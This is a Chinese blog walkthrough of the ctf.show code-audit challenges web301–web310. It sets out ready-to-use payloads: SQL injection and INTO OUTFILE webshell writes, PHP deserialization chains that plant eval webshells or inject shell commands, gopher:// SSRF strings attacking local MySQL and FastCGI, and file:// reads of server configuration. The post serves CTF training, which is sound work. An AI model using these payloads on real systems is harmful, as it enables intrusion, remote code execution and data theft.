ctf.show WEB入门-代码审计

最新推荐文章于 2024-05-28 15:09:40 发布
最新推荐文章于 2024-05-28 15:09:40 发布
阅读量4.3k 收藏 4
点赞数 1
分类专栏: CTF ctfshow 文章标签: ctf ctfshow
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hiahiachang/article/details/121546514
版权
CTF 同时被 2 个专栏收录
28 篇文章 7 订阅
订阅专栏
ctfshow
4 篇文章 0 订阅
订阅专栏

文章目录

web301

checklogin.php 里的 sql 无任何验证

$username=$_POST['userid'];
$userpwd=$_POST['userpwd'];
$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";
$result=$mysqli->query($sql);

直接利用如下语句即可登录

userid=1' union select 1%23&userpwd=1

image-20211125203210302

2、直接用 sqlmap 跑也能账号密码 admin/ctfshowwwww,登录即可拿到 flag。

3、写 shell

userid=1' union select '<?php eval($_POST[1]);?>' into outfile '/var/www/html/air.php'%23&userpwd=1

web302

修改的地方:

if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){

登录时判断了被 sds_decode() 处理后的密码是否和查询出来的密码一致。

if(!strcasecmp($userpwd,$row['sds_password'])){
	$_SESSION['login']=1;
	$result->free();
	$mysqli->close();
	header("location:index.php");
	return;
}

追踪 sds_decode() 到 fun.php,可以自己运行一下得到 admin 被处理后的值。

<?php
function sds_decode($str){
	return md5(md5($str.md5(base64_encode("sds")))."sds");
}
echo sds_decode('admin');
//27151b7b1ad51a38ea66b1529cde5ee4
?>

构造 payload:

userid=1' union select '27151b7b1ad51a38ea66b1529cde5ee4'%23&userpwd=admin

此题也还可以用写 shell 的形式:

userid=1' union select '<?php eval($_POST[1]);?>' into outfile '/var/www/html/air.php'%23&userpwd=1

web303

checklogin.php 可知虽然存在 sql 注入漏洞,但是被限制了长度导致没法使用

$username=$_POST['userid'];
# username长度不能大于6
if(strlen($username)>6){
	die();
}
$userpwd=$_POST['userpwd'];
$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";
$result=$mysqli->query($sql);

登录时判断了被 sds_decode() 处理后的密码是否和查询出来的密码一致。

if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){
	$_SESSION['login']=1;
	$result->free();
	$mysqli->close();
	header("location:index.php");
	return;
}

追踪 sds_decode() 到 fun.php,可以自己运行一下得到 admin 被处理后的值。

<?php
function sds_decode($str){
	return md5(md5($str.md5(base64_encode("sds")))."sds");
}
echo sds_decode("admin");
//27151b7b1ad51a38ea66b1529cde5ee4%
?>

结合 sds_user.sql 文件可知密码就是 admin

INSERT INTO `sds_user` VALUES ('1', 'admin', '27151b7b1ad51a38ea66b1529cde5ee4');

admin/admin 进行登录即可。

发现 dptadd.php 文件也存在 insert 注入,前提就是得先登录。

$sql="insert into sds_dpt set sds_name='".$dpt_name."',sds_address ='".$dpt_address."',sds_build_date='".$dpt_build_year."',sds_have_safe_card='".$dpt_has_cert."',sds_safe_card_num='".$dpt_cert_number."',sds_telephone='".$dpt_telephone_number."';";
$result=$mysqli->query($sql);

dpt.php 则是显示结果。

构造 payload:

# 库名: sds
dpt_name=1%27,sds_address=(select database())#

# 表名: sds_dpt,sds_fl9g,sds_user	
dpt_name=1%27,sds_address=(select group_concat(table_name) from information_schema.tables where table_schema=database())#

# 列名: flag
dpt_name=1%27,sds_address=(select group_concat(column_name) from information_schema.columns where table_name='sds_fl9g')#

# 字段值
dpt_name=1%27,sds_address=(select group_concat(flag) from sds_fl9g)#

web304

增加了全局 waf

function sds_waf($str){
	return preg_match('/[0-9]|[a-z]|-/i', $str);
}

好像 waf 未生效,还是 web303 的payload:

# 库名: sds
dpt_name=1%27,sds_address=(select database())#

# 表名: sds_dpt,sds_flaag,sds_user
dpt_name=1%27,sds_address=(select group_concat(table_name) from information_schema.tables where table_schema=database())#

# 列名: flag
dpt_name=1%27,sds_address=(select group_concat(column_name) from information_schema.columns where table_name='sds_flaag')#

# 字段值
dpt_name=1%27,sds_address=(select group_concat(flag) from sds_flaag)#

web305

fun.php 里多了个 sds_waf,注入应该是不行了。

function sds_waf($str){
	if(preg_match('/\~|\`|\!|\@|\#|\$|\%|\^|\&|\*|\(|\)|\_|\+|\=|\{|\}|\[|\]|\;|\:|\'|\"|\,|\.|\?|\/|\\\|\<|\>/', $str)){
		return false;
	}else{
		return true;
	}
}

多了一个 class.php 文件

class user{
	public $username;
	public $password;
	public function __construct($u,$p){
		$this->username=$u;
		$this->password=$p;
	}
	public function __destruct(){
		file_put_contents($this->username, $this->password);
	}
}

在 checklogin.php 文件有一个反序列化的点

$user_cookie = $_COOKIE['user'];
if(isset($user_cookie)){
	$user = unserialize($user_cookie);
}

构造 payload:

<?php
class user{
	public $username;
	public $password;
}

$a = new user();
$a->username = '1.php';
$a->password = '<?php eval($_POST[1]);?>';
echo serialize($a);
/* O:4:"user":2:{s:8:"username";s:5:"1.php";s:8:"password";s:24:"<?php eval($_POST[1]);?>";} */

对序列化结果进行 url 编码一下,在 Cookie 处传 payload 如下:

user=O%3A4%3A%22user%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%221.php%22%3Bs%3A8%3A%22password%22%3Bs%3A24%3A%22%3C%3Fphp%20eval(%24_POST%5B1%5D)%3B%3F%3E%22%3B%7D

image-20211130204359591

可借助蚁剑的数据管理找到 flag。

image-20211130204759772

web306

class.php 发现 file_put_contents() 写操作。

class log{
	public $title='log.txt';
	public $info='';
	public function loginfo($info){
		$this->info=$this->info.$info;
	}
	public function close(){
		file_put_contents($this->title, $this->info);
	}

}

寻找调用 close() 方法的类,发现在 dao.php 里的 dao 类调用了此方法:

public function __destruct(){
	$this->conn->close();
}

我们只要使 conn 指向 log 类的对象即可。

unserialize 操作有两处,不过 login.php 由于没有包含 dao.php 导致反序列化会失败,而 index.php 则是包含了 dao.php 文件:

require "dao.php";
$user = unserialize(base64_decode($_COOKIE['user']));

构造 payload:

<?php
class log{
	public $title;
	public $info;
}

class dao{
	private $conn;
    public function __construct($a){
		$this->conn = $a;
	}
}

$a = new log();
$a->title = '1.php';
$a->info = '<?php eval($_POST[1]);?>';
$b = new dao($a);
echo base64_encode(serialize($b));
//TzozOiJkYW8iOjE6e3M6OToiAGRhbwBjb25uIjtPOjM6ImxvZyI6Mjp7czo1OiJ0aXRsZSI7czo1OiIxLnBocCI7czo0OiJpbmZvIjtzOjI0OiI8P3BocCBldmFsKCRfUE9TVFsxXSk7Pz4iO319

去访问 index.php 并在 Cookie 处传入如下值即可生成 1.php 木马文件。

user=TzozOiJkYW8iOjE6e3M6OToiAGRhbwBjb25uIjtPOjM6ImxvZyI6Mjp7czo1OiJ0aXRsZSI7czo1OiIxLnBocCI7czo0OiJpbmZvIjtzOjI0OiI8P3BocCBldmFsKCRfUE9TVFsxXSk7Pz4iO319

网站根目录下有个 flag.php,读取即可。

web307

搜了一下,发现 unserialize 操作有四处。

找可利用点,虽然在 controller/service/dao/class.php 中的 log 类的 closelog() 方法存在 file_put_contents() 写操作,不过没有被调用,无法利用。

发现在 controller/service/dao/dao.php 存在 shell_exec 方法

public function  clearCache(){
	shell_exec('rm -rf ./'.$this->config->cache_dir.'/*');
}

只要修改 cache_dir 使其为恶意语句即可。

寻找调用了 clearCache() 方法的地方,发现 logout.php 处可利用。

require 'service/service.php';
$service = unserialize(base64_decode($_COOKIE['service']));
if($service){
	$service->clearCache();
}

logout.php 包含的是 service.php,不过 service.php 包含了 dao.php

require ROOT.'/dao/dao.php';

所以我们可以直接利用 dao 类的 clearCache() 方法,从而调用 shell_exec() 函数。

构造payload:

<?php
class config{
    public $cache_dir = ';echo \'<?php eval($_POST[1]);?>\' > 1.php;';
}
class dao{
    private $config;
	public function __construct(){
		$this->config=new config();
	}
}
$a = new dao();
echo base64_encode(serialize($a));
//TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czo5OiJjYWNoZV9kaXIiO3M6NDE6IjtlY2hvICc8P3BocCBldmFsKCRfUE9TVFsxXSk7Pz4nID4gMS5waHA7Ijt9fQ==

访问 /controller/logout.php 文件,在 Cookie 传入如下内容

service=TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czo5OiJjYWNoZV9kaXIiO3M6NDE6IjtlY2hvICc8P3BocCBldmFsKCRfUE9TVFsxXSk7Pz4nID4gMS5waHA7Ijt9fQ

image-20211130214225436

web308

题目描述:

需要拿shell

上一题的 controller/service/dao/dao.php 处的 dao 类的 clearCache() 方法处的 shell_exec 增加了过滤,应该是无法利用了。

public function  clearCache(){
		if(preg_match('/^[a-z]+$/i', $this->config->cache_dir)){
			shell_exec('rm -rf ./'.$this->config->cache_dir.'/*');
		}
	}

发现在 controller/service/util/fun.php 存在 ssrf:

function checkUpdate($url){
    $ch=curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    $res = curl_exec($ch);
    curl_close($ch);
    return $res;
}

发现在 dao.php 里确实存在调用

public function checkVersion(){
    return checkUpdate($this->config->update_url);
}

只要修改掉 update_url 的值即可。

发现在 index.php 里可以利用

require 'controller/service/service.php';
$service = unserialize(base64_decode($_COOKIE['service']));
if($service){
    $lastVersion=$service->checkVersion();
}
?>

这里由于我们并不知道 flag 文件在那里,可以借助 gopher:// 去打 mysql 服务,这里借助 gopherus 工具生成

select '<?php eval($_POST[1]);?>' into outfile '/var/www/html/1.php'

image-20211130220450868

构造 payload:

<?php
class config{
    public $update_url = 'gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%45%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%29%3b%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%31%2e%70%68%70%27%01%00%00%00%01';
}
class dao{
    private $config;
	public function __construct(){
		$this->config=new config();
	}
}
$a = new dao();
echo base64_encode(serialize($a));

访问 index.php,在 Cookie 处传入如下内容即可生成 1.php 一句话木马文件。

service=TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czoxMDoidXBkYXRlX3VybCI7czo3NjA6ImdvcGhlcjovLzEyNy4wLjAuMTozMzA2L18lYTMlMDAlMDAlMDElODUlYTYlZmYlMDElMDAlMDAlMDAlMDElMjElMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlNzIlNmYlNmYlNzQlMDAlMDAlNmQlNzklNzMlNzElNmMlNWYlNmUlNjElNzQlNjklNzYlNjUlNWYlNzAlNjElNzMlNzMlNzclNmYlNzIlNjQlMDAlNjYlMDMlNWYlNmYlNzMlMDUlNGMlNjklNmUlNzUlNzglMGMlNWYlNjMlNmMlNjklNjUlNmUlNzQlNWYlNmUlNjElNmQlNjUlMDglNmMlNjklNjIlNmQlNzklNzMlNzElNmMlMDQlNWYlNzAlNjklNjQlMDUlMzIlMzclMzIlMzUlMzUlMGYlNWYlNjMlNmMlNjklNjUlNmUlNzQlNWYlNzYlNjUlNzIlNzMlNjklNmYlNmUlMDYlMzUlMmUlMzclMmUlMzIlMzIlMDklNWYlNzAlNmMlNjElNzQlNjYlNmYlNzIlNmQlMDYlNzglMzglMzYlNWYlMzYlMzQlMGMlNzAlNzIlNmYlNjclNzIlNjElNmQlNWYlNmUlNjElNmQlNjUlMDUlNmQlNzklNzMlNzElNmMlNDUlMDAlMDAlMDAlMDMlNzMlNjUlNmMlNjUlNjMlNzQlMjAlMjclM2MlM2YlNzAlNjglNzAlMjAlNjUlNzYlNjElNmMlMjglMjQlNWYlNTAlNGYlNTMlNTQlNWIlMzElNWQlMjklM2IlM2YlM2UlMjclMjAlNjklNmUlNzQlNmYlMjAlNmYlNzUlNzQlNjYlNjklNmMlNjUlMjAlMjclMmYlNzYlNjElNzIlMmYlNzclNzclNzclMmYlNjglNzQlNmQlNmMlMmYlMzElMmUlNzAlNjglNzAlMjclMDElMDAlMDAlMDAlMDEiO319

web309

题目描述:

需要拿shell,308的方法不行了,mysql 有密码了

方式和 web308 一样,不过是打的 fastcgi,默认端口 9000。可通过 gopher 协议的延迟进行判断。

这里由于我们并不知道 flag 文件在那里,可以借助 gopher:// 去打 fastcgi 服务,这里借助 gopherus 工具生成 payload:

image-20211130230155392

构造 payload:

<?php
class config{
    public $update_url = 'gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%00%F6%06%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH59%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%09SCRIPT_FILENAMEindex.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3B%04%00%3C%3Fphp%20system%28%27ls%20-alh%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00';
}
class dao{
    private $config;
	public function __construct(){
		$this->config=new config();
	}
}
$a = new dao();
echo base64_encode(serialize($a));

访问 index.php,在 Cookie 处传入如下内容即可看到目录列表。

service=TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czoxMDoidXBkYXRlX3VybCI7czo1NzQ6ImdvcGhlcjovLzEyNy4wLjAuMTo5MDAwL18lMDElMDElMDAlMDElMDAlMDglMDAlMDAlMDAlMDElMDAlMDAlMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlRjYlMDYlMDAlMEYlMTBTRVJWRVJfU09GVFdBUkVnbyUyMC8lMjBmY2dpY2xpZW50JTIwJTBCJTA5UkVNT1RFX0FERFIxMjcuMC4wLjElMEYlMDhTRVJWRVJfUFJPVE9DT0xIVFRQLzEuMSUwRSUwMkNPTlRFTlRfTEVOR1RINTklMEUlMDRSRVFVRVNUX01FVEhPRFBPU1QlMDlLUEhQX1ZBTFVFYWxsb3dfdXJsX2luY2x1ZGUlMjAlM0QlMjBPbiUwQWRpc2FibGVfZnVuY3Rpb25zJTIwJTNEJTIwJTBBYXV0b19wcmVwZW5kX2ZpbGUlMjAlM0QlMjBwaHAlM0EvL2lucHV0JTBGJTA5U0NSSVBUX0ZJTEVOQU1FaW5kZXgucGhwJTBEJTAxRE9DVU1FTlRfUk9PVC8lMDAlMDAlMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlMDAlMDAlMDAlMDElMDUlMDAlMDElMDAlM0IlMDQlMDAlM0MlM0ZwaHAlMjBzeXN0ZW0lMjglMjdscyUyMC1hbGglMjclMjklM0JkaWUlMjglMjctLS0tLU1hZGUtYnktU3B5RDNyLS0tLS0lMEElMjclMjklM0IlM0YlM0UlMDAlMDAlMDAlMDAiO319

image-20211130230324103

web310

方法一:还是可以用 gopher 去打 fastcgi 写入一句话木马文件

echo "<?php eval(\$_POST[1]);?>" > /var/www/html/shell.php

image-20211130233327736

构造 payload:

<?php
class config{
    public $update_url = 'gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH110%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00n%04%00%3C%3Fphp%20system%28%27echo%20%22%3C%3Fphp%20eval%28%5C%24_POST%5B1%5D%29%3B%3F%3E%22%20%3E%20/var/www/html/shell.php%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00';
}
class dao{
    private $config;
	public function __construct(){
		$this->config=new config();
	}
}
$a = new dao();
echo base64_encode(serialize($a));

访问 index.php,在 Cookie 处传入如下内容即可写入shell。

service=TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czoxMDoidXBkYXRlX3VybCI7czo2Njk6ImdvcGhlcjovLzEyNy4wLjAuMTo5MDAwL18lMDElMDElMDAlMDElMDAlMDglMDAlMDAlMDAlMDElMDAlMDAlMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDElMDUlMDUlMDAlMEYlMTBTRVJWRVJfU09GVFdBUkVnbyUyMC8lMjBmY2dpY2xpZW50JTIwJTBCJTA5UkVNT1RFX0FERFIxMjcuMC4wLjElMEYlMDhTRVJWRVJfUFJPVE9DT0xIVFRQLzEuMSUwRSUwM0NPTlRFTlRfTEVOR1RIMTEwJTBFJTA0UkVRVUVTVF9NRVRIT0RQT1NUJTA5S1BIUF9WQUxVRWFsbG93X3VybF9pbmNsdWRlJTIwJTNEJTIwT24lMEFkaXNhYmxlX2Z1bmN0aW9ucyUyMCUzRCUyMCUwQWF1dG9fcHJlcGVuZF9maWxlJTIwJTNEJTIwcGhwJTNBLy9pbnB1dCUwRiUxN1NDUklQVF9GSUxFTkFNRS92YXIvd3d3L2h0bWwvaW5kZXgucGhwJTBEJTAxRE9DVU1FTlRfUk9PVC8lMDAlMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlMDAlMDAlMDAlMDElMDUlMDAlMDElMDBuJTA0JTAwJTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI3ZWNobyUyMCUyMiUzQyUzRnBocCUyMGV2YWwlMjglNUMlMjRfUE9TVCU1QjElNUQlMjklM0IlM0YlM0UlMjIlMjAlM0UlMjAvdmFyL3d3dy9odG1sL3NoZWxsLnBocCUyNyUyOSUzQmRpZSUyOCUyNy0tLS0tTWFkZS1ieS1TcHlEM3ItLS0tLSUwQSUyNyUyOSUzQiUzRiUzRSUwMCUwMCUwMCUwMCI7fX0=

image-20211130233218653

方法二:尝试读取 nginx 的默认配置文件:

file:///etc/nginx/nginx.conf

构造 payload:

<?php
class config{
    public $update_url = 'file:///etc/nginx/nginx.conf';
}
class dao{
    private $config;
	public function __construct(){
		$this->config=new config();
	}
}
$a = new dao();
echo base64_encode(serialize($a));

image-20211130232204907

$update_url 改为如下值都可以得到 flag。

http://127.0.0.1:4476
file:///var/flag/index.html

参考羽师傅文章:CTFSHOW 代码审计篇

转载请注明出处
本文网址:https://blog.csdn.net/hiahiachang/article/details/121546514

airrudder
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[CTF]CTFSHOW反序列化
Sapphire037的博客
01-20 3766
265 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-04 23:52:24 # @Last Modified by: h1xa # @Last Modified time: 2020-12-05 00:17:08 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); include('flag.php');
ctfshow代码审计
qq_61768489的博客
01-26 1268
4476端口对应着 /var/flag目录,有个index.html文件,这和我们连上蚁剑后知道的一样。给的源码还是308,还是用fastcgi,这次直接写shell进去,因为flag文件不知道在哪。可以利用file_put_contents来写shell ,需要调用close()方法。思路与上题一样,不过是输入的password经过了一点加密,构造一下就行。sql注入写shell也是没问题的,因为sql语句依旧是正常执行了。似乎没有调用,与上题一样,换一种方式,有报错信息就试试报错注入。
ssrf原理及ctfshow例题
最新发布
2301_80499103的博客
05-28 768
1.ssrf的原理SSRF (Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统,也正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔绝的内部系统。也就是说可以利用一个网络请求的服务,当作跳板进行攻击。攻击者利用了可访问Web服务器(A)的特定功能 构造恶意payload;
CTFshow——代码审计
D.MIND 的博客
04-07 1476
文章目录web301——SQL注入web301——SQL注入web303——报错注入web304——报错注入web305——web306——web307—— web301——SQL注入 将源码下载下来。主要看checklogin.php: $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; $result=$mysqli->query($sql); $row=
ctfshow web入门 代码审计
Sentiment的博客
02-12 2879
web301
CTF之preg_match()函数绕过
天天学安全专属博客
03-06 4207
CTF之preg_match()函数绕过,preg_match()常用的绕过方法
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
CTF资料.rar-------
02-16
ctf入门
CTF 竞赛入门指南(ctf-all-in-one).pdf
09-07
一、基础篇;二、工具篇;三、分类专题篇;四、技巧篇;五、高级篇;六、题解篇;七、实战篇... 2000多页的电子书,讲解细致,值得搜藏。
CTF-WEB入门DOC-2019版1
08-03
CTF-WEB入门DOC-2019版1】主要涵盖了CTF竞赛与Web安全相关的基础知识和进阶技能,适合对网络安全有兴趣,尤其是希望在Web安全领域发展的人群。以下将详细介绍其中的关键知识点: 一、CTF简介及目标: CTF...
ist的matlab代码-darkarmy-ctf.github.io:darkarmy-ctf.github.io
05-26
ist的matlab代码黑暗军团 描述: Dark Army是一支由CTF组成的国际团队,只是一个具有良好安全意识的普通团队,同时也是努力工作的网络安全爱好者。 CTF和黑客机器的使用 DarkCTF即将推出... DarkArmy的我们正在为...
ctfshow 代码审计
qq_45951598的博客
05-21 707
web301 这里看了一下文件发现,就一些登入页面文件 然后简单看了一下文件,定位到checklogin.php这个文件,做个简单的代码审计 <?php error_reporting(0); session_start(); require 'conn.php'; $_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:""; //判断当前传入的userid是否为空,空的话返回为空 $_POST['userpwd']=!empty(
PolarCTF WEB题目 代码审计1WP
weixin_62257805的博客
10-13 256
PolarCTF WEB题目 代码审计1WP
ctf_show笔记篇(web入门---代码审计
whale_waves的博客
03-13 1124
在dao.php文件找到了当最后销毁序列化时调用close(__destruct魔法函数), 这里就要用到__construct魔法函数, 当执行new实例化的时候就会调用, 一会儿再去找哪里实例化了dao这个类, 将$this->config=new config()修改为$this->conn->=apt()这里$this->config->cache_dir指向了config类里的cache_dir变量, 刚好又是个public公共便变量可以修改。这里的'问好'像下面一样加密一下。
【BUUCTF之easy_tornado】
qq_40646572的博客
05-15 894
打开题目网站,发现存在三个文件,都打开看了下,在hint.txt文件中发现提示。 在flag.txt文件中也有提示flag在/fllllllllllllag文件中。 整理下思路,这道题其实关键点在于hint.txt文件中的cookie_secret值。 但考虑到题目名中包含tornado这个关键词,百度下发现这是一个python的web框架,搜索下是否存在可以读取配置文件的漏洞,发现这个框架存在可以读取配置文件的漏洞。 想到还有一个welcome.txt文件,上面提示到render,渲染。想到ss..
CTFshow 代码审计
starttv的博客
11-30 896
分析源码在dptadd.php有注入点,无过滤,但要求先登录,尝试弱口令admin,admin登录成功。所以我写入一个php查数据库的文件,可以正常查询。发现多了个class.php,并且在checklogin.php有反序列入口,到这里思路就清晰了。​协议的延时可以探测端口是否开放,开放的端口会保持连接,而未开放的端口会直接返回页面结果,经探测后。写入一句话木马后用蚁剑连接查数据库即可,数据库的用户名和密码可以在conn.php中找到。在index.php和login.php中发现反序列化入口。
ctfshow web308 ssrf
fmyyy1的博客
07-15 365
在index.php里 $service = unserialize(base64_decode($_COOKIE['service'])); if($service){ $lastVersion=$service->checkVersion(); } 在dao.php中有checkVersion方法 checkUpdate function checkUpdate($url){ $ch=curl_init(); curl_setopt($ch, CURLOPT_URL, $ur.
CTFSHOW-WEB入门代码审计
Re_ly0n的博客
11-02 430
web301 漏洞点checklogin.php $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; sqlmap一把梭出来账号密码登录拿到flag web302 更改部分 if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){ sqlmap跑出来账号密码却不知为何无法登录,然后尝试写
ctfshow 代码审计 web301-web310 wp
mumuzi的博客
02-03 1710
也是囤货 别说我卷了 球球惹
ctf.show_web5
10-22
ctf.show_web5是一个CTF比赛中的WEB模块第5关,需要传递两个参数v1和v2,要求v1必须是纯字母字符串,v2必须是数字或数字字符串,并且两个参数的md5值必须相等。可以利用md5的0e漏洞进行绕过。具体来说,可以构造一个...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值